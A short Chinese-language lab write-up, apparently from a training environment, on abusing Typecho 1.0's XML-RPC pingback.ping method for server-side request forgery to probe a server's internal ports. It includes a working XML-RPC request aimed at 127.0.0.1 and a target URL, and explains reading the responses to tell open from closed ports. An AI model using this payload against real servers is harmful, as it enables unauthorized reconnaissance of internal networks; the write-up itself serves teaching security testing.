利用 XMLRpc的 SSRF 漏洞进行内网端口的探测

直接访问：http://120.203.13.75:8123/ssrf/typecho-1.0-14.10.9-release/index.php/action/xmlrpc
页面提示如下：

image.png

提示信息告诉我们，该URL访问的是一个xmlrpc服务，但该服务只接受POST请求。
因为这里可以通过xmlrpc来对外发起网络请求，所以这里也存在SSRF漏洞。
关于xmlrpc请求为什么会存在SSRF漏洞，下面贴一段搜索到的解释：

image.png

通过搜索引擎可以查到xmlrpc的请求包格式，于是构造如下xml请求来探测内网端口是否开放：

<?xml version="1.0" encoding="utf-8"?>
<methodCall> 
  <methodName>pingback.ping</methodName>
  <params>
    <param>
      <value>
        <string>http://127.0.0.1:1133</string>
      </value>
    </param>
    <param>
      <value>
        <string>ladybird</string>
      </value>
    </param>
  </params>
</methodCall>

用BurpSuite改包：

image.png

可以看到服务器内网的1133端口并未开放。

再测试内网的88端口：

image.png

可以看到服务器内网的88端口是开放的。